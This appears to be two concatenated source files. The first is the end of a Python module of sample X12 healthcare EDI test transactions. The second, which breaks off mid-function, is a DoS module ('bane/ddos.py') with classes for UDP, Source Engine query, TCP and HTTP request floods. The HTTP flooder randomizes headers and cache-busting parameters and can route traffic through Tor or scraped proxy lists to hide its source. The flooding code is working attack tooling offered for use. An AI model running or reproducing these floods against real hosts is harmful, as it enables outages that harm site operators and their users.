REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'per_segment_repeat': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *041210*0107*U*00401*412100107*0*P*:~
GS*FA*RECEIVER*SENDER*20041210*010712*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*PER*7**5~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0001~
GE*1*56~
IEA*1*412100107~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A1~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TE*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
NM1*40*2*Payer*****46*21312311~
HL*1**20*1~
NM1*85*2*Biller 1*****XX*2309-2222~
N3*1123 MILL~
N4*VOID*MI*49002~
PER*IC*Contact Name*TE*111-555-2222~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*M***MI*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19460101*M~
REF*SY*370600000~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*999.6***12::1*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*30*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'repeat_init_segment':
{
'res997': """ISA*00* *00* *ZZ*111111960 *ZZ*111111536 *070829*1105*U*00401*708291105*0*T*:~
GS*FA*111111960*111111536*20070829*110552*1*X*004010~
ST*997*0001~
AK1*HS*1~
AK2*270*0001~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1~
IEA*1*708291105~""",
'source': """ISA*00* *00* *ZZ*111111536 *ZZ*111111960 *000816*2105*U*00401*000168037*0*T*:~
GS*HS*111111536*111111960*20070816*2105*1*X*004010X092A1~
ST*270*0001~
BHT*0022*13*1764*20070816*2105~
HL*1**20*1~
NM1*PR*2*TEST PAYER*****PI*100111~
HL*2*1*21*1~
NM1*1P*2*test*****SV*111111111~
HL*3*2*22*0~
TRN*1*1764*9174458207*test~
NM1*IL*1*Blok*Ingrid****MI*00111111~
REF*SY*382111111~
DMG*D8*19950111~
DTP*472*D8*20070801~
EQ*30**IND~
EQ*30**CHD~
SE*15*0001~
GE*1*1~
IEA*1*000168037~"""
},
'simple1':
{
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *040701*1611*U*00401*407011611*0*T*:~
GS*FA*ZZ001*ZZ000*20040701*161145*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK3*BHT*1**3~
AK3*HL*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*17~
IEA*1*407011611~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~
SE*2*11280001~
GE*1*17~
IEA*1*000010121~"""
},
'simple_837p': {
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *081117*1543*U*00401*811171543*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20081117*154310*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
AK2*837*1179~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*811171543~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
CLM*5555*21***12::1*Y*A*Y*A*B~
HI*BK:317~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
LX*3~
SV1*HC:H2017:TT*1*UN*12***1~
DTP*472*D8*20050414~
REF*6R*105797~
SE*63*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'simple_837i': {'source':
"""ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*2~
SV2*0101**0*UN*5*0*0~
DTP*472*RD8*20031214-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*3~
SV2*0102**0*UN*5*0*0~
DTP*472*RD8*20031212-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
CLM*12522229*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0103**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*2~
SV2*0104**0*UN*5*0*0~
DTP*472*RD8*20031214-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
LX*3~
SV2*0105**0*UN*5*0*0~
DTP*472*RD8*20031212-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*132*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'834_lui_id_5010': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00501*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*005010X220A1~
ST*834*0001*005010X220A1~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'resAck': """ISA*00* *00* *ZZ*00GR *ZZ*D00111 *070320*1721*U*00501*703201721*0*P*:~
GS*FA*00GR*D00111*20070320*172121*13360001*X*005010X231~
ST*997*0001*005010X231~
AK1*BE*13360001*005010X220A1~
AK2*834*0001*005010X220A1~
IK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*13360001~
IEA*1*703201721~
"""},
'834_eol_in_element': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00501*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*005010X220A1~
ST*834*0001*005010X220A1~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST
APT 55~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'resAck': """ISA*00* *00* *ZZ*00AA *ZZ*D00XXX *131107*1503*^*00501*311071503*0*P*:~
GS*FA*00AA*D00XXX*20131107*150355*608852007*X*005010X231~
ST*999*0001*005010X231~
AK1*BE*13360001*005010X220A1~
AK2*834*0001*005010X220A1~
IK3*N3*12**8~
IK4*1*166*6*<LF>~
IK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*608852007~
IEA*1*311071503~
"""},
}
if __name__ == '__main__':
import os.path
for k in datafiles:
if 'source' in datafiles[k]:
with open(os.path.join('files', k + '.txt'), 'w') as f:
f.write(datafiles[k]['source'])
| 22.935223 | 127 | 0.671197 | 10,226 | 50,985 | 3.343145 | 0.074223 | 0.04607 | 0.058443 | 0.030538 | 0.889432 | 0.883143 | 0.870243 | 0.862755 | 0.849709 | 0.843362 | 0 | 0.450262 | 0.094989 | 50,985 | 2,222 | 128 | 22.945545 | 0.290646 | 0 | 0 | 0.854197 | 0 | 0.026379 | 0.969003 | 0.38294 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00048 | 0 | 0.00048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
bd0125900a44b3823c4881f38a04fe8a1d52cda6 | 67 | py | Python | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 15 | 2017-07-11T13:34:22.000Z | 2021-08-16T12:32:51.000Z | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 34 | 2018-10-26T14:39:47.000Z | 2020-08-03T12:19:26.000Z | PW_explorer/Custom_Distance_Functions/dummy_dist_func.py | idaks/PW-explorer | 2ea90722924ed2c0a04805f1588f304affc36354 | [
"Apache-2.0"
] | 1 | 2017-08-09T05:04:56.000Z | 2017-08-09T05:04:56.000Z | def dist(pw_id_1, pw_id_2, **kwargs):
return pw_id_1 - pw_id_2
| 22.333333 | 37 | 0.701493 | 16 | 67 | 2.4375 | 0.5 | 0.410256 | 0.25641 | 0.358974 | 0.512821 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 0.179104 | 67 | 2 | 38 | 33.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
bd3dac22666d5700d0d5f8bfb0ebbb8610488f5f | 50,586 | py | Python | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | bane/ddos.py | AlaBouali/BANEokey | 18160d406b214ff7647d7fd33e59d67b3e2e5a06 | [
"MIT"
] | null | null | null | import requests, cfscrape, socks, os, sys, urllib, socket, random, time, threading, ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import the dependencies for each python version
if sys.version_info < (3, 0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2 = urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
if os.path.isdir("/data/data") == True:
adr = True # the device is an android
if os.path.isdir("/data/data/com.termux/") == True:
termux = True # the application which runs the module is Termux
if (termux == False) or (adr == False):
from bane.swtch import *
def reorder_headers_randomly(s):
b = s.split("\r\n\r\n")[1]
a = s.split("\r\n\r\n")[0]
m = a.split("\r\n")[0]
c = a.split("\r\n")[1:]
random.shuffle(c)
return m + "\r\n" + "\r\n".join(c) + "\r\n\r\n" + b
def random_param():
a = random.randint(1, 2)
if a == 1:
return str(random.randint(1, 1000))
else:
return random.choice(lis)
def setup_http_packet(
target,
ty,
paths,
post_field_min,
post_field_max,
post_min,
post_max,
cookie,
user_agents,
):
pa = random.choice(paths) # bypassing cache engine
q = ""
for i in range(random.randint(2, 5)):
q += random_param() + random_param()
p = ""
for i in range(random.randint(2, 5)):
p += random_param() + random_param()
if "?" in pa:
jo = "&"
else:
jo = "?"
pa += jo + q + "=" + p
# setting random headers
for l in range(random.randint(1, 5)):
ed = random.choice(ec)
oi = random.randint(1, 3)
if oi == 2:
gy = 0
while gy < 1:
df = random.choice(ec)
if df != ed:
gy += 1
ed += ", "
ed += df
l = random.choice(al)
for n in range(random.randint(0, 5)):
l += ";q={},".format(round(random.uniform(0.1, 1), 1)) + random.choice(al)
kl = random.randint(1, 2)
ck = ""
if cookie:
ck = "Cookie: " + cookie + "\r\n"
if ty == 1:
m = "GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
pa,
ck,
random.choice(user_agents),
random.choice(a),
l,
ed,
random.choice(ac),
random.randint(100, 1000),
random.choice(cc),
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
target,
)
else:
k = ""
for _ in range(random.randint(post_field_min, post_field_max)):
k += random.choice(lis)
j = ""
for x in range(random.randint(post_min, post_max)):
j += random.choice(lis)
par = k + "=" + j
m = "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(
pa,
ck,
random.choice(user_agents),
l,
random.randint(300, 1000),
len(par),
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
target,
par,
)
return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
try:
return (
requests.get(
"https://public-dns.info/nameservers.txt", timeout=timeout
).text
).split("\n")
except:
return []
def reset(): # reset all values
global counter
counter = 0
global stop
stop = False
global coo
coo = False
global ual
ual = []
global flag
flag = -1
global ier
ier = 0
global pointer
pointer = 0
global ue
ue = []
"""
the following classes are for DoS attacks simulations with different tools that have been either originally written in
diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for
some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
"""
class udp_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
interval=0.001,
min_size=10,
max_size=10,
connection=True,
duration=60,
threads=1,
limiting=True,
logs=False,
):
self.target = u
self.port = p
self.interval = interval
self.min_size = min_size
self.max_size = max_size
self.connection = connection
self.duration = duration
self.limiting = limiting
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
tm = time.time()
size = 0
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.connection == True:
s.connect((self.target, self.port))
msg = ""
for x in range(random.randint(self.min_size, self.max_size)):
msg += random.choice(lis)
if len(msg) > 1400:
msg = msg[
0:1400
] # make sure all payloads' sizes are on the right range
s.sendto((msg.encode("utf-8")), (self.target, self.port))
size += len(msg)
self.counter += 1
if (self.logs == True) and (int(time.time() - tm) == 1):
sys.stdout.write(
"\rPackets: {} | Bytes/s: {} ".format(self.counter, size)
)
sys.stdout.flush()
tm = time.time()
size = 0
if self.limiting == True:
time.sleep(self.interval)
except:
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
self.stop = True
a = self.__dict__["counter"]
self.reset() # this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
return a
class vse_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
interval=0.001,
connection=True,
duration=60,
threads=1,
limiting=True,
logs=False,
):
self.target = u
self.port = p
self.payload = b"\xff\xff\xff\xffTSource Engine Query\x00" # read more at https://developer.valvesoftware.com/wiki/Server_queries
self.interval = interval
self.connection = connection
self.duration = duration
self.limiting = limiting
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
tm = time.time()
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.connection == True:
s.connect((self.target, self.port))
s.sendto(self.payload, (self.target, self.port))
self.counter += 1
if (self.logs == True) and (int(time.time() - tm) == 1):
sys.stdout.write("\rPackets: {} ".format(self.counter))
sys.stdout.flush()
tm = time.time()
if self.limiting == True:
time.sleep(self.interval)
except:
pass
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class tcp_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
min_size=10,
max_size=50,
threads=256,
timeout=5,
round_min=1000,
round_max=10000,
interval=0.001,
duration=60,
logs=False,
tor=False,
):
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.min_size = min_size
self.max_size = max_size
self.interval = interval
self.round_min = round_min
self.round_max = round_max
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1) # give time for all threads to be created
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout = (
self.timeout
) # we can't set timeout with socks module if we are going to use a socks proxy
if self.tor == True:
s.setproxy(
socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True
) # let the traffic go through tor
s.connect((self.target, self.port)) # connect to target
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(
s, ssl_version=ssl.PROTOCOL_TLSv1
) # use ssl if needed on specific ports
for l in range(
random.randint(self.round_min, self.round_max)
): # send packets with random number of times for each connection (number between "round_min" and "round_max")
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if stop == True:
break
m = ""
for li in range(
random.randint(self.min_size, self.max_size)
): # each payload' size is chosen randomly between maximum and minimum values
m += random.choice(lis)
try:
if stop == True:
break
s.send(m.encode("utf-8"))
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rPackets: {} | Bytes: {} ".format(
self.counter, len(m)
)
)
sys.stdout.flush()
# print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
time.sleep(self.interval)
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(0.1)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
"""
usage:
>>>bane.tcp_flood('www.google.com')
>>>bane.tcp_flood('www.google.com',p=80, threads=150, timeout=5)
p: (set by default to: 80) targeted port
threads: (set by default to: 256) threads to use
timeout: (set by default to: 5) timeout flag
"""
class http_spam:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
method=3,
threads_daemon=True,
paths=["/"],
threads=256,
post_min=5,
post_max=10,
post_field_max=100,
post_field_min=50,
timeout=5,
round_min=1000,
round_max=10000,
interval=0.001,
duration=60,
logs=False,
tor=False,
):
self.logs = logs
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.method = method
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.interval = interval
self.round_min = round_min
self.round_max = round_max
self.paths = paths
self.post_min = post_min
self.post_max = post_max
self.post_field_max = post_field_max
self.post_field_min = post_field_min
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout = self.timeout
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
for l in range(random.randint(self.round_min, self.round_max)):
if self.method == 3:
ty = random.randint(1, 2)
else:
ty = self.method
if ty == 1:
req = "GET"
else:
req = "POST"
m = setup_http_packet(
self.target,
ty,
self.paths,
self.post_field_min,
self.post_field_max,
self.post_min,
self.post_max,
self.cookie,
self.user_agents,
)
try:
if self.stop == True:
break
s.send(m.encode("utf-8"))
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rRequest: {} | Type: {} | Bytes: {} ".format(
self.counter, req, len(m)
)
)
sys.stdout.flush()
# print("Request: {} | Type: {} | Bytes: {}".format(http_counter,req,len(m)))
time.sleep(self.interval)
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(0.1)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class prox_http_spam:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
method=3,
threads_daemon=True,
scraping_timeout=15,
http_list=None,
socks4_list=None,
socks5_list=None,
paths=["/"],
threads=256,
post_min=5,
post_max=10,
post_field_max=100,
post_field_min=50,
timeout=5,
round_min=1000,
round_max=10000,
interval=0.001,
duration=60,
logs=False,
):
self.logs = logs
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.method = method
self.stop = False
self.counter = 0
self.httplist = http_list
if not self.httplist and self.httplist != []:
self.httplist = masshttp(timeout=scraping_timeout)
self.socks4list = socks4_list
if not self.socks4list and self.socks4list != []:
self.socks4list = massocks4(timeout=scraping_timeout)
self.socks5list = socks5_list
if not self.socks5list and self.socks5list != []:
self.socks5list = massocks5(timeout=scraping_timeout)
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.interval = interval
self.round_min = round_min
self.round_max = round_max
self.paths = paths
self.post_min = post_min
self.post_max = post_max
self.post_field_max = post_field_max
self.post_field_min = post_field_min
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
bot_type = []
if len(self.httplist) > 0:
bot_type.append("h")
if len(self.socks4list) > 0:
bot_type.append("s4")
if len(self.socks5list) > 0:
bot_type.append("s5")
z = random.choice(bot_type)
if z == "h":
line = random.choice(self.httplist)
elif z == "s4":
line = random.choice(self.socks4list)
elif z == "s5":
